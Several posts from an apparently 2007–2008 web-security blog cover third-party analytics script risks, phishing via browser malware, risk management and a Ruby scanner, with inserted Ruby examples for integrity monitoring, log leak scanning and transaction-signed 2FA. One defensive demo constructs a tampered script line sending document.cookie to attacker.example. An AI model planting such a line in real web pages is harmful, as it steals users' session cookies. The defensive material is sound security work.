STS Blog

Bula!

August 10th, 2008 by Jordan Del-Grande (Dedicated Page)

Bula Everyone,

For those who have never been, I do highly recommend a trip to Fiji. I just came back from a week on Tokoriki Island off the coast of Nadi. I am highly refreshed and am ready to jump back into work and be more proactive with my security blogs…

Also, a very warm hello goes out to most of my friends at black hat. Thanks for the wake up call whilst you were all partying in Vegas but I only received the voice message when I got back (Golden Rule in Fiji: No Technology Allowed). 

Finally, I did receive some comments regarding the STS Scanner and why it lacked a number of plugins that I could easily write up. It’s true, I could easily write them up and I have with some other much more useful features, but I use this version for company use only. The online version is really just a baseline to teach people more about the ideas and frameworks that can be used to build a web application security scanner. It is not meant to be exhaustive with features and add-ons, as that may confuse the point of the tutorial and would most likely only be used by script kiddies. Of course, anyone who understands what I have coded can easily add more features on as that was the point of why I purposely made the tool extensible.

Vinaka

Web Analytic Tools

June 26th, 2008 by Jordan Del-Grande (Dedicated Page)

I recently had a client inquire about some of the potential risks associated with using a 3rd party web analytics tool.

Businesses normally want to use these tools to report on the behavior of users who visit their site in order to improve customer experience and measure sales performance. All that is required is for the business to include an innocuous-looking JavaScript tag (provided by the 3rd party) in each page it would like to measure. If the user's browser allows JavaScript to run, the tag runs on every visit and loads a more advanced script from the 3rd party's server.

For example, let’s say I provided a web analytics service and you used me as a 3rd party. I would provide you with the below script and then you would place the following tag on every page of your website…

<script src="http://www.securitytechscience.com/sts.js" type="text/javascript"></script>

The sts.js script on my server would then run in the user's browser every time a user visited your site. I would then provide you with a log-in page that generates pretty reports for you to see how your user base is behaving.

Sounds great doesn’t it? Now for the risks…

NB: The risks below apply to companies that host more than just brochureware web applications, that is, sites that handle customer data rather than only static marketing pages.

Integrity of the script - Maybe the script is OK today but what about tomorrow?

How could you be assured that the 3rd party wouldn’t change it? What if the 3rd party server was hacked and replaced with malicious code by someone else? If a change were to occur how long before you would notice? If you did notice then what?

The above questions go to the heart of three core functions of information security within any organisation…

  1. Change control: If the 3rd party wanted to change the script then they should notify you and this would be input to your change control process.
  2. Audit & Monitoring: The 3rd party should provide this, but you could just as easily write a script that downloads the script hourly and compares it to your known-good copy.
  3. Incident Response: If the script were to change without prior change control notification then there should be an incident response plan to follow.
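
As an added example (not part of the original post or the STS tooling), here is the hourly monitor from point 2 written in Ruby. It keeps the approved copy of the vendor's script, compares the SHA-256 of whatever is being served now against it, and when the two differ reports which hosts the new version refers to that the approved one did not, which is the first thing an incident responder will ask. The script body, the attacker host and the fetch URL are constructed for the example; `fetch_script` is the only part that touches the network and is not exercised by the sample run.

```ruby
require 'digest'
require 'net/http'
require 'uri'

# The copy of the vendor's script that was reviewed and approved (constructed
# sample standing in for the real sts.js). Keep the real one under version control.
APPROVED_SCRIPT = <<~JS
  // sts.js - constructed sample, not the vendor's code
  var img = new Image();
  img.src = "http://www.securitytechscience.com/collect?u=" + encodeURIComponent(location.href);
JS

HOST_RE = %r{https?://([A-Za-z0-9.-]+)}i

# Hosts a script body refers to, so a change report can say where new traffic would go.
def referenced_hosts(body)
  body.scan(HOST_RE).flatten.map(&:downcase).uniq.sort
end

# Compare the script as served now with the approved copy.
# :ok      - byte-for-byte identical (same SHA-256)
# :changed - differs; the report lists hosts that only the new version mentions
def check_script(served, approved)
  served_sha = Digest::SHA256.hexdigest(served)
  return { status: :ok, sha256: served_sha } if served_sha == Digest::SHA256.hexdigest(approved)
  { status: :changed,
    sha256: served_sha,
    size_delta: served.bytesize - approved.bytesize,
    new_hosts: referenced_hosts(served) - referenced_hosts(approved) }
end

# Live fetch for the hourly job (not exercised offline). Redirects are not
# followed on purpose: a redirect to another host is itself a change to alert on.
def fetch_script(url)
  res = Net::HTTP.get_response(URI(url))
  raise "unexpected HTTP #{res.code} fetching #{url}" unless res.is_a?(Net::HTTPOK)
  res.body
end

if __FILE__ == $PROGRAM_NAME
  # Simulate a tampered copy that also exfiltrates cookies to a constructed host.
  tampered = APPROVED_SCRIPT +
    "new Image().src = \"http://attacker.example/k?c=\" + encodeURIComponent(document.cookie);\n"
  puts check_script(APPROVED_SCRIPT, APPROVED_SCRIPT).inspect
  puts check_script(tampered, APPROVED_SCRIPT).inspect
end
```

Run it from cron once an hour against the approved copy; a :changed result that was not preceded by a change-control notice is the trigger for point 3. Browsers can now enforce the same comparison on every load through the script tag's integrity attribute (Subresource Integrity), which refuses to run a script whose digest does not match the one on the page; the monitor is still worth having because it tells you the script changed instead of silently breaking your analytics.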

Integrity of the 3rd Party

How could you be sure that the 3rd party uses a level of security practices that are aligned with your organisation? How could you be sure that if things did go wrong you were covered?

The above questions are concerned with a breadth of business units such as operational risk & compliance, legal as well as information security. They would include questions such as…

  1. Is there a contract between the third party and the organisation?
  2. Does the contract include x, y, z to cover the organisation in the event of a, b, c?
  3. Does the contract include a SAS70 or equivalent?
  4. Does the contract include a monetary figure?
  5. Has privacy been considered?

In most (if not all) 3rd party contracts, the above questions favour the 3rd party and not you.

Confidentiality of the Data

How can you be certain that any confidential data remains secure? How is the data (both confidential and non-confidential) transferred?

Although you may be using SSL (ie, https), the 3rd party may not be, in which case the script's calls back to the 3rd party go over plain http and any sensitive data they carry crosses the Internet in the clear.

Even if both you and the 3rd party are using SSL (ie, https), what if the JavaScript sends its data as the parameters of an HTTP GET request? SSL does encrypt the URI and its parameters while they are in transit, but a GET puts those values into the URL itself, and the full URL is recorded in the 3rd party's web server access logs (and in the logs of any proxy that terminates SSL along the way). Analytics scripts also normally report the address of the page being viewed, query string included, so anything your own application puts in a page's query string goes to the 3rd party with it. Sensitive data sent this way is readable by everyone who can get at those logs. For example,

GET https://www.example.com/cc_valid.js?credit_no=123412341234&date=31122008&ccv=123

And finally, do you really want an external script running anywhere near your customer’s sensitive information?
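
To make the logging point concrete, here is an added example in Ruby (not from the original post) that scans web server access-log lines for sensitive values carried in request URIs. It parses each request's query string, expands any parameter whose value is itself a URL (the page address an analytics beacon reports), and flags parameters either by name or by a value that passes the Luhn check used by card numbers, so a card number hiding under an innocent name is still caught. The three log lines are constructed: the first is the request from the post as the 3rd party's server would log it, the third is a beacon that has picked up a card number from a page's own query string.

```ruby
require 'uri'

# Constructed access-log lines (NCSA combined format) as the third party's web
# server would record them. Line 1 is the request from the post; line 3 is an
# analytics beacon whose u= parameter carries the full URL of the viewed page.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/Jun/2008:10:12:01 +1000] "GET /cc_valid.js?credit_no=123412341234&date=31122008&ccv=123 HTTP/1.1" 200 512 "https://www.example.com/checkout" "Mozilla/5.0"
  203.0.113.7 - - [26/Jun/2008:10:12:05 +1000] "GET /sts.js HTTP/1.1" 200 2048 "https://www.example.com/" "Mozilla/5.0"
  198.51.100.9 - - [26/Jun/2008:10:13:44 +1000] "GET /collect?u=https%3A%2F%2Fwww.example.com%2Fsearch%3Fq%3D4111111111111111 HTTP/1.1" 200 43 "-" "Mozilla/5.0"
LOG

REQUEST_RE      = /"(?:GET|POST|HEAD) (\S+) HTTP\/\d\.\d"/
SENSITIVE_NAMES = /credit|card|ccv|cvv|cvc|pass|pin|ssn|tfn/i

# Luhn check: a 13-19 digit value that passes it is treated as a card number.
def luhn_valid?(digits)
  sum = 0
  digits.reverse.each_char.with_index do |ch, i|
    d = ch.to_i
    if i.odd?
      d *= 2
      d -= 9 if d > 9
    end
    sum += d
  end
  (sum % 10).zero?
end

# Name/value pairs from a request target's query string. A value that is itself
# a URL is parsed as well (to a small depth), so parameters leaked through a
# reported page URL are not missed.
def query_pairs(target, depth = 0)
  uri = URI.parse(target)
  return [] if uri.query.nil? || depth > 2
  pairs = URI.decode_www_form(uri.query)
  nested = pairs.select { |_, v| v.start_with?('http://', 'https://') }
                .flat_map { |_, v| query_pairs(v, depth + 1) }
  pairs + nested
rescue URI::Error, ArgumentError
  []                                # unparsable target: nothing to report for it
end

def sensitive_pair?(name, value)
  return true if name =~ SENSITIVE_NAMES
  value =~ /\A\d{13,19}\z/ ? luhn_valid?(value) : false
end

# One finding per log line that carries sensitive data in its request URI.
def find_leaks(log_text)
  log_text.each_line.with_index(1).map do |line, n|
    m = REQUEST_RE.match(line) or next
    hits = query_pairs(m[1]).select { |k, v| sensitive_pair?(k, v) }
    next if hits.empty?
    { line: n, target: m[1], params: hits.map(&:first) }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  find_leaks(SAMPLE_LOG).each { |f| puts "line #{f[:line]}: #{f[:params].join(', ')} in #{f[:target]}" }
end
```

Point the same scan at your own access logs before signing with a vendor: if it finds anything, the data is already in logs you control, and the vendor's copy of the page URL will carry it too. The fix is on the application side (sensitive values go in a POST body, never the query string), not in the analytics contract.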

Problem

As you can see, the above solution adds considerable overhead if you want to implement it securely in order to protect your customers' data and your company's reputation. As a business, the benefits promised at the beginning of the sales pitch may not sound so great anymore, and you may be leaning toward building a solution in-house. Although that is a secure solution, you soon find out it comes at a much higher cost. So is there an alternative solution?

Solution

I would recommend copying the 3rd party script onto a server in your own organisation so that control of the script is now with you. The vendor is now forced to contact you when they would like to update the script, and a compromise of the vendor's server no longer changes what your users run. Two caveats: check that the copied script does not itself load further code from the vendor's server (or the local copy gains you nothing), and remember that it still sends the data it collects back to the 3rd party, so the confidentiality points above still apply and what it sends should be reviewed before you host it. You could go even further and ask that the reporting functionality is housed on your network. That is, you provide the box and they provide the application. If they won't allow you to house the application, you could always set up a B2B channel with the 3rd party for the cases where sensitive data may be transferred. This channel could be over a dedicated link or a VPN using an IPsec tunnel.

Keep your theme whilst blogging

June 26th, 2008 by Jordan Del-Grande (Dedicated Page)

Hi All

Since I began this blog I always wanted to keep the original theme of my website instead of flicking over to the WordPress default theme when the user clicked on "Blog". Well, as you can see I've finally done it!

So if you ever wanted to know how to keep the same theme with your blog and your site’s css then read this blog

http://max.limpag.com/2006/09/01/how-to-convert-any-web-template-into-a-wordpress-theme/

All you need is:

  • Style sheet - styles.css
  • Index page - index.html
  • Images directory - /images
  • A screen shot of your home page

Have fun!

Data Leakage - Are we there yet?

May 26th, 2008 by Jordan Del-Grande (Dedicated Page)

Data leakage is becoming a buzzword in the Information Security arena again after a slight dip since 2004. A little disappointing if you think about it, because the definition of "Information Security" is the protection of information/data from threats such as leakage. Hence, this should be the first thing on the mind of an Information Security professional at all times, much like a well-rehearsed slogan similar to the property slogan…

It is all about data, data, data!

Hopefully companies can begin to realise how important the above slogan is before they lose their confidential data and, more importantly, continually remember how important it is. Unfortunately that is one of the paradoxes of Information Security, described below, that all information security professionals must struggle with over time.

That is, when good information security practices are occurring within a company then nothing actually happens. It's a good and bad thing for security: good as there may be no data breaches, and bad as the business is wondering what it is spending its money on if nothing is occurring. After a while the business will begin to cut back on spending (and hence security practices) and do things cheaper and riskier. Then certain events occur, such as what we saw in 2004 when data leakage and offshoring was a hot topic. The problems get fixed with more spending and over time data leakage again goes off the radar. Today, with new threats such as phishing (or more correctly identity theft and fraud) and huge data breaches hitting the press like TJX, data leakage is on the radar again and businesses are beginning to reinvest.

The paradox can be thought of much like a sine wave oscillating over time: the greater the cost, the lower the probability of data leakage; the lower the cost, the greater the probability of data leakage.

NB: The y-axis has probability and cost inverted ;-)

Next I hope to post some economic strategies to help prevent data leakage.

Risk Management for Dummies

March 30th, 2008 by Jordan Del-Grande (Dedicated Page)

I have attended many a conference on risk management and also gained a few certifications in the field. This involved reading a number of books (some more long winded than others) and redoing the multiple choice questions until I was satisfied I had learnt their version of what the 'correct' answer was… This process was a little disheartening as I have met some great risk managers who have no certifications and met some 'below par' risk managers who have more certifications than you can poke a stick at. I don't wish to bring into question the certification bodies as I believe a central body is required and their intent is to provide the most relevant information to date. Yes, I will agree with most complaints that these certifications have their flaws, but I wouldn't say that you are better off with no certification. I think these types of questions should be redirected to the individual, their past experiences and how well they can define what risk management means to them.

This post is my best attempt at a "risk management" definition that turns the above questioning onto me. That is, I will try to describe in the most succinct way what I believe risk management to be in an information security context. I will do this as if I were in an interview without citing a dictionary, wiki or Google. You will just have to trust that I don't cheat ;-)

I perceive risk as driven by two related facets: the likelihood of an event occurring, combined with the impact 'it' will cause if 'it' does eventuate. That is, the lower the likelihood of an event and the lower the impact the event will have, the lower the risk. Conversely, the higher the likelihood and impact, the higher the risk.

Note: The 'it' in the above sentence would be either a 'vulnerability' or a 'threat'. The eventuation would be defined as a 'threat' that successfully 'exploits' the 'vulnerability'.

Now, the most important piece of the equation is the "management". I say it is the most important as a lot of security professionals sometimes forget that without the business there is no need for risk management. Or more simply, without the business there is no need for you (to protect it).

The management piece to me involves defining business objectives and performing a cost benefit analysis of the risk versus the business objective. Most of the time this is best performed with a key manager from the business who knows the business's strategic goals and short term plans. After this step, the prioritisation of risk in combination with the information resource can be more accurately defined. Based on this information, recommendations such as countermeasures or mitigating controls can then be incorporated.

From here it is up to the Business Owner and the Chief Information Security Officer to decide whether the risk should be mitigated, which costs money, or whether it can be accepted/signed off, which involves no additional cost but does mean bearing and tracking the risk.

 

Fighting against Phishing?

February 23rd, 2008 by Jordan Del-Grande (Dedicated Page)

Lately I have had discussions with members of my team about the recent increase in phishing attacks. In addition, when chatting with some clients and reading Bank web sites, I read advertisements such as secure code, improvements in security with 2-factor auth, sophisticated fraud detection systems, early warning phishing scam alerts, etc. I always find it funny when companies advertise security, because they always use buzz words like the above, which you could read as "so you also do insecure coding then?", "and sometimes you worsen your security with other products?", "there are unsophisticated fraud detection systems but you have the other one?", or "the other guys bought the late warning detection system but not you?"…

Anyway, most of the controls listed above are an attempt to mitigate the increase in phishing that has been occurring at an impressive rate over the last number of years. In an attempt to protect the end user, the Banks are spending a lot of money on the above controls to finally stop phishing and, if you believe the advertising spinsters, cease fraudulent Internet activity altogether. The question I am asking today is, well, do they?

In short, the above controls will mitigate and protect the end user against phishing attacks as we define them today. The unfortunate truth for the end user and the Banks is that the attack itself will morph into something new to bypass the current controls, and the "Phishing" definition will need to be updated by the security terminology purists or a new word will need to be created that is a subset of Phishing.

You may be asking yourself, "hold on, they have two factor auth, that definitely stops phishing attacks doesn't it?".

The classic response I give most clients is yes and no. That is, yes, it may stop the majority of phishing attacks today, but tomorrow brings a brand new day and no it may not stop it then (in the example below, tomorrow is actually today…think about it).

You see, an attack is not static and the above controls are assuming that Phishing will remain the same and once these controls are in place everything should be ok….right? Well, at least that’s what the people who are implementing or selling these systems are telling their upper management and/or clients until the project wraps up. By then it will be time to work on the next big idea as the old anti phishing project just isn’t cutting it. And once again they can say, not our fault, those hackers are really really intelligent.

I guess people who work in the anti-phishing industry might be upset with the above statements, but to be honest, it is the same kind of statement I could be making about any other “anti” security  industry, such as the anti-virus industry. That is, malicious person/s (organisation) or anti virus company releases a virus -> business and end-users are frightened and buy anti-virus software to stop the virus -> anti virus company builds and distributes anti virus protection -> business and end-user feel safe and keep renewing contract -> anti virus company and malicious person/s makes money.

Ok, maybe you think I am being a bit harsh with my words and that phishing is different… Well then, how about I finish with an example…

MPack is a nice/nasty (depending on your viewpoint) web exploit kit: installed on a server the attacker controls or has compromised, it serves browser exploits to vulnerable clients that talk to that server. For example, a site you are lured to, and you (your PC). To go along with the Phishing theme as promised, let's also add an infected server that is acting as a Phishing site for your favourite bank (see below).

Banking Site                  <—–>                  Phishing Site

       |——————-You——————-|

So here is the scenario… You get an email saying that your Bank is doing an upgrade to its Internet Banking site and you need to log in immediately for security reasons. The email is actually spam from an organised crime group. You click on the link, which takes you to the phishing site hosting an MPack kit. Either your patches are not up to date or the MPack server has a 0-day exploit, and your machine is compromised. Malware is then downloaded to your computer unbeknownst to you. Note: In the classic Phishing attack your user name and password are stolen when you submit them to the Phishing site. In this attack, that is not necessary (do you see the phishing attack morphing?).

On a completely different day (or any time after your machine has been owned), you decide to do some Internet Banking and log in to your favourite banking site. The malware that now resides on your computer (and has been happily logging everything you do, as well as acting as a part-time warez server and/or pr0n site) notices the bank URL in your browser. A program is now launched (again unbeknownst to you) that sits within your browser, i.e. inside the session, so SSL certificates, cookies, etc. don't protect you. You happily type in your username and password, as you are a security-savvy individual and can see the padlock on the screen, and enter the site.

Note: This is where the malware becomes especially important in the attack. Instead of you seeing what the bank is actually displaying to you, the malware is intercepting this and displaying what it thinks you should see. Hence, it is up to the imagination of the programmer of the malware on which attack she would like to deploy. In this case, we are only going to use one simple example where you lose all the money in your account.

Note: The malware in your browser is analogous to a person’s brain suffering from schizophrenia and hence they have a distorted view of reality.

You now browse to your account transfers section to transfer funds from your account to your local gas company. The malware is displaying these things to you, but in what it actually submits it has replaced the gas company with a mule account. You click transfer and then receive either a number of images to click on or even the new and "secure" SMS service that sends a PIN to your phone which must be entered. You click the right combination of images or enter the PIN from the phone and click pay. The malware happily intercepts these values and submits the transfer to the mule account.

Note: I guess if the SMS contained the destination account number (or part thereof) and you really were paying attention, you might catch that something is wrong, since the SMS arrives on a separate device that the malware on your PC is not drawing the screen for. That is, unless the malware is aware of this and keeps showing the gas company's account number on the screen while the mule account number is what it actually sent. Anyway, it depends on the Bank's implementation of two factor authentication.
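
An added example in Ruby (not part of the original post, and not any bank's actual scheme) of the implementation detail the note above turns on: a two-factor code computed over the destination account and amount the customer keys into a separate token or phone app, rather than a bare one-time PIN. The bank recomputes the code over the details it actually received, so if the malware has swapped the gas company for a mule account the code no longer verifies and the bank rejects the transfer itself instead of relying on the customer to read the SMS carefully. The shared secret, account numbers and amounts are constructed; the truncation step follows the HOTP construction from RFC 4226.

```ruby
require 'openssl'

# Secret shared between the bank and the customer's token at enrolment.
# Constructed value for the example; a real one is random and per customer.
TOKEN_SECRET = 'constructed-shared-secret-not-for-use'.freeze

# Code over the transaction details the customer keyed in: destination account,
# amount in cents and a per-transaction counter (so a captured code cannot be replayed).
def transaction_code(secret, dest_account, amount_cents, counter)
  msg = "#{dest_account}|#{amount_cents}|#{counter}"
  mac = OpenSSL::HMAC.digest('SHA256', secret, msg).bytes
  # HOTP-style dynamic truncation (RFC 4226): 31 bits from an offset given by the last nibble.
  off = mac[-1] & 0x0f
  num = ((mac[off] & 0x7f) << 24) | (mac[off + 1] << 16) | (mac[off + 2] << 8) | mac[off + 3]
  format('%06d', num % 1_000_000)
end

# Constant-time comparison so the verifier does not leak how many digits matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Bank side: recompute over the details that arrived from the browser.
def verify_transaction(secret, dest_account, amount_cents, counter, code)
  secure_equal?(transaction_code(secret, dest_account, amount_cents, counter), code)
end

# End to end: what the customer signed on the token versus what the (possibly
# tampered) browser submitted. Returns true only if the bank accepts the transfer.
def bank_accepts?(signed, submitted, counter)
  code = transaction_code(TOKEN_SECRET, signed[:dest], signed[:amount], counter)   # typed in by the customer
  verify_transaction(TOKEN_SECRET, submitted[:dest], submitted[:amount], counter, code)
end

if __FILE__ == $PROGRAM_NAME
  gas  = { dest: '062-000 12345678', amount: 10_000 }   # constructed gas company account, $100.00
  mule = { dest: '033-000 87654321', amount: 10_000 }   # constructed mule account
  puts "honest browser:   #{bank_accepts?(gas, gas, 1)}"
  puts "mule substituted: #{bank_accepts?(gas, mule, 1)}"
end
```

The SMS variant in the post gets part of the way there when the message spells out the destination and amount the bank received, because PC malware cannot rewrite a text on a separate phone; binding the code to the details the customer entered moves the comparison from the customer to the bank.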

Hopefully enough said.

Happy Banking!  

STS Scanner Tutorial and Other Stuff

January 20th, 2008 by Jordan Del-Grande (Dedicated Page)

I have just completed a tutorial on how to use the STS Scanner correctly. I believe it to be comprehensive with detailed commands and screen shots but your comments would be appreciated…You can download the pdf tutorial here.

On a side note, I found an interesting blog that mentioned the Security Technology Science site. I think it is worth mentioning that this site has some really detailed and interesting blogs. For starters, here is a link to their 10 day vulnerability assessment found here. You should also check out their blog on Security Testing Tools of 2007 found here.

Anyway, one thing I would like to clarify is a past article I wrote about screen scraping. I described XPath as "complex" when in fact I should have used different wording. I should have said that I find the use of XPath when crawling an unknown site to be "complex" in comparison to the solution below. What I mean by this is that using XPath to screen scrape a page that is known to me is indeed straightforward (as long as you understand the XPath syntax and the DOM structure), but what happens when you or your tool have never seen the page before? How do I know there is an anchor tag at html/body/div[4]/div/div[2]/ul/li/a/ and not at html/body/div[4]/div/div[2]/ul/a/? Anyway, maybe there is an easy answer to this and an algorithm has already been written, but at the time it just seemed a lot easier in Ruby to get all the links on the one page with one line of code (page being a Mechanize page object)…

page.links.each { |link| ... }

Finally, the STS Scanner uses Mechanize and Hpricot to parse and spider HTML pages. These libraries are not able to parse and identify JavaScript and/or Ajax code. A separate version of the STS Scanner is planned where the internal core does not rely on these libraries, and hence they shall become obsolete. The core shall act more like an everyday browser (i.e., IE, Firefox, etc.) so it can hopefully branch out into other applications such as Flash and web services. So those who thought I was going to solve the Web 2.0 problem with these libraries are mistaken…

STS Scanner Released

January 8th, 2008 by Jordan Del-Grande (Dedicated Page)

After a few minor adjustments to the scanner and some additional tweaks to the web crawler, it is time to release the very first version of STS Scanner. All the information about the scanner and where to download is available online here

Requirements:

  1. Ruby Interpreter and Ruby Gems
  2. Hpricot Ruby Gem

Bugs:

Send all bugs to bugs [at ] securitytechscience [dot] com

Please test responsibly…

STS Scanner is Still Coming…

December 29th, 2007 by Jordan Del-Grande (Dedicated Page)

Hello everyone!

Sorry for the delay in the release, but I have spent the last few months travelling around Asia and haven't had much time for coding, testing, debugging, etc… Also, I have been spending my weekends down by the beach enjoying myself on Sydney's sunny shores ;-)
I promise to have a release out very soon, possibly a New Year's Eve treat?

Anyway, one thing is for sure and that is coding is a winter sport.

Screen Scraping

November 25th, 2007 by Jordan Del-Grande (Dedicated Page)

Before the release of the sts-scanner, I plan to add some crawling capabilities, as the strategy is to take the tool to a level where there is minimal human interaction (i.e., no manual crawling of the web application). Note: I am a big fan of the manual crawl, as it is possibly the best assurance you have that every link of a web application has been clicked and all forms have been correctly submitted. So the idea of building a crawler that can perform like, or even better than, a human sounds like a nice challenge…

Firstly, some of the obvious problems with basic crawlers are things like malformed HTML, frames, forms, JavaScript, Ajax, web services and Web 2.0 in general, to name a few, breaking the crawling algorithm. Some crawlers simply fall apart when faced with these challenges and, as a result, you end up with a minimal or, in extreme cases, no attack surface to test.

This blog is about how I plan to overcome some of these challenges and implement them within the sts-scanner. I will only focus on web 1.0 for now as I will concentrate on web services, web 2.0, ajax and javascript at a later date.
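
As an added example in Ruby (not the STS Scanner's own code), here is the bookkeeping that sits around the `page.links.each` one-liner from the January post above: pulling link targets out of a page, turning them into absolute in-scope URLs, and feeding a crawl frontier without revisiting anything. It handles a few of the things listed above that trip up naive crawlers (relative links, fragments, unquoted attributes, mailto:/javascript: pseudo-links, form actions, off-site links, malformed hrefs). The HTML is constructed, and the regex extractor is there only so the example has no dependencies; the scanner itself uses Mechanize and Hpricot for that step.

```ruby
require 'uri'
require 'set'

# Constructed page standing in for a crawled response. It mixes the things a
# naive crawler trips over: relative links, a fragment, an unquoted attribute,
# mailto:/javascript: pseudo-links, a form action and an off-site link.
SAMPLE_HTML = <<~HTML
  <html><body>
  <a href="/about.html">About</a>
  <a href='login.php?next=/account'>Login</a>
  <a href=index.html#top>Home</a>
  <a href="mailto:bugs@securitytechscience.com">Bugs</a>
  <a href="javascript:void(0)">Menu</a>
  <a href="http://www.example.org/other">Off-site</a>
  <form action="/search.php" method="get"><input name="q"></form>
  </body></html>
HTML

# href/action values in double quotes, single quotes or unquoted. A regex is used
# only to keep this dependency-free; the scanner uses Hpricot/Mechanize for this step.
TARGET_RE = /<(?:a|form)\b[^>]*?\b(?:href|action)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i

def extract_targets(html)
  html.scan(TARGET_RE).map { |groups| groups.compact.first }
end

# Resolve a raw target against the page it came from and decide whether it is
# crawlable and in scope. Returns the absolute URL, or nil to skip it.
def normalize(target, base)
  return nil if target =~ /\A(?:mailto|javascript|tel):/i
  abs = URI.join(base, target)
  abs.fragment = nil                                  # #top is client-side only
  return nil unless %w[http https].include?(abs.scheme)
  return nil unless abs.host == URI(base).host        # stay on the site under test
  abs.to_s
rescue URI::Error
  nil                                                 # malformed href: skip it, do not crash the crawl
end

# Push a page's links onto the frontier, skipping anything already seen.
# `seen` is shared across the whole crawl; `frontier` is the queue of pages to fetch next.
def enqueue_links(html, base, seen, frontier)
  extract_targets(html).each do |t|
    u = normalize(t, base) or next
    frontier << u if seen.add?(u)
  end
  frontier
end

if __FILE__ == $PROGRAM_NAME
  base = 'http://www.securitytechscience.com/index.html'
  frontier = enqueue_links(SAMPLE_HTML, base, Set[base], [])
  puts frontier
end
```

The crawl loop is then: pop a URL from the frontier, fetch it, call enqueue_links on the response with that URL as base, repeat until the frontier is empty. Forms are queued by their action only; submitting them with values is the separate problem the post's manual-crawl note is about.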

Read the rest of this entry »